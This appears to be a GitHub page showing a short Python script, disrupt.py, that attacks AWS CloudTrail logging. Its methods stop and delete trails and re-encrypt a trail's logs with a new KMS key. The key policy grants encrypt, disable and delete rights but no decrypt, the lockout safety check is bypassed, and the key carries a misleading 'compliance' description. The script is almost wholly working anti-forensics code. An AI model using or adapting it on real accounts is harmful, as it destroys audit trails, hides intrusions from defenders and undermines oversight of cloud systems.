Files

 master

/

disrupt.py

Blame

Blame

Latest commit

 

History

History

executable file

·

91 lines (82 loc) · 2.63 KB

 master

/

disrupt.py

Top

File metadata and controls

• Code
• Blame

executable file

·

91 lines (82 loc) · 2.63 KB

Raw

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

import boto3

import inventory

class Distruptor(object):

def __init__(self):

self.client = boto3.client('cloudtrail', 'us-west-2')

self.who = inventory.Who()

self.account_id = self.who.identity['Account']

self.user_id = self.who.identity['UserId']

self.arn = self.who.identity['Arn']

def stop_trail(self, name):

response = self.client.stop_logging(

Name = name

)

return response

def delete_trail(self, name):

response = self.client.delete_trail(

Name= name

)

def encrypt_trail(self, name):

response = self.client.update_trail(

Name = name,

KmsKeyId = self.generate_encrypt_only_key()

)

def generate_encrypt_only_key(self):

policy = """{

"Version": "2012-10-17",

"Id": "Key policy created for CloudTrail",

"Statement": [

{

"Sid": "Enable IAM User Permissions",

"Effect": "Allow",

"Principal": {

"AWS": "USER_ARN"

},

"Action": [

"kms:DisableKey",

"kms:ScheduleKeyDeletion",

"kms:GenerateDataKey*",

"kms:DescribeKey"

],

"Resource": "*"

},

{

"Sid": "Allow CloudTrail to encrypt logs",

"Effect": "Allow",

"Principal": {

"Service": "cloudtrail.amazonaws.com"

},

"Action": "kms:GenerateDataKey*",

"Resource": "*",

"Condition": {

"StringLike": {

"kms:EncryptionContext:aws:cloudtrail:arn": "arn:aws:cloudtrail:*"

}

}

},

{

"Sid": "Allow CloudTrail to describe key",

"Effect": "Allow",

"Principal": {

"Service": "cloudtrail.amazonaws.com"

},

"Action": "kms:DescribeKey",

"Resource": "*"

}

]

}"""

policy = policy.replace("USER_ARN", self.arn)

client = boto3.client('kms', 'us-west-2')

#print policy

response = client.create_key(

Policy=policy,

Description='Super important key for compliance stuff.',

KeyUsage='ENCRYPT_DECRYPT',

Origin='AWS_KMS',

BypassPolicyLockoutSafetyCheck=True

)

return response['KeyMetadata']['KeyId']

if __name__ == '__main__':

d = Distruptor()

print d.generate_encrypt_only_key()

#print d.who.identity